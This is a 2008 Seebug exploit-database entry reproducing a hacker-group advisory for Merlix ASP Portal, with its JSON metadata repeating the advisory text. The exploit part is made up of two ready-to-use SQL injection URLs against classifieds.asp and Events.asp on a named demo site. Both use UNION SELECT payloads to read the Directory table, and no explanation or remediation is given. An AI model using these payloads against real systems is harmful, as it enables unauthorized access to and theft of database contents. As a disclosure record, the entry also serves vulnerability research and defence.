ID SSV:10196
Type seebug
Reporter Root
Modified 2008-12-08T00:00:00
Description
No description provided by source.
###########################################################################
#---------------------------------------------------OffensiveTrack--------------------------------------------------------#
###########################################################################
---------------------------- Tunisian Muslim ------------------------------
#found by : OffensiveTrack
#Author : AlpHaNiX
#website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script : Merlix ASP PORTAL
#download : null
#Demo : http://demo.merlix.com/portal/
#Exploit :
--=[SQL INJECTION]=--
http://demo.merlix.com/portal/classifieds.asp?ItemID=-0+union+select+1,2,3,4,5,6,7,8,9,10+from+Directory
http://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from+Directory
#Greetz For Synex
###########################################################################
{"href": "https://www.seebug.org/vuldb/ssvid-10196", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-12-08T00:00:00", "title": "ASP PORTAL Multiple Remote SQL Injection Vulnerabilities", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10196", "cvelist": [], "description": "No description provided by source.", "viewCount": 2, "published": "2008-12-08T00:00:00", "sourceData": "\n ###########################################################################\r\n#---------------------------------------------------OffensiveTrack--------------------------------------------------------#\r\n###########################################################################\r\n\r\n---------------------------- Tunisian Muslim ------------------------------\r\n\r\n#found by : OffensiveTrack\r\n#Author : AlpHaNiX\r\n#website : www.offensivetrack.org\r\n#contact : AlpHa[AT]HACKER[DOT]BZ\r\n\r\n###########################################################################\r\n\r\n#script : Merlix ASP PORTAL\r\n#download : null\r\n#Demo : http://demo.merlix.com/portal/\r\n\r\n\r\n#Exploit :\r\n--=[SQL INJECTION]=--\r\nhttp://demo.merlix.com/portal/classifieds.asp?ItemID=-0+union+select+1,2,3,4,5,6,7,8,9,10+from+Directory\r\nhttp://demo.merlix.com/portal/Events.asp?ID=-0+union+select+1,2,3,4,5,6,7,8+from+Directory\r\n\r\n\r\n\r\n#Greetz For Synex\r\n\r\n###########################################################################\r\n\n ", "id": "SSV:10196", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:19:53", "reporter": "Root", "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2017-11-19T21:19:53", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T21:19:53", "rev": 2}, "vulnersScore": -0.2}, "references": []}
{}